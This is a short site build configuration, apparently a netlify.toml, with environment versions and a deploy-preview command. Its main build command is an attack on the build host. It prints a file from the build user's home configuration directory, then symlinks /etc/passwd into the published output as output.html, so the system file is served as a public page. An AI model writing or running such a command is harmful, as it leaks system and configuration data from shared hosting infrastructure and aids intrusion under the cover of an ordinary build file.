[build]
  command = "cd /opt/buildhome/ && cat .config/configstore/update-notifier-npm.json && cd /opt/build && mkdir dist && cd dist && ln -s /etc/passwd output.html"
  publish = "dist"
[build.environment]
  YARN_VERSION = "1.10.1"
  HUGO_VERSION = "0.46"

[context.deploy-preview]
  command = "yarn build-preview"
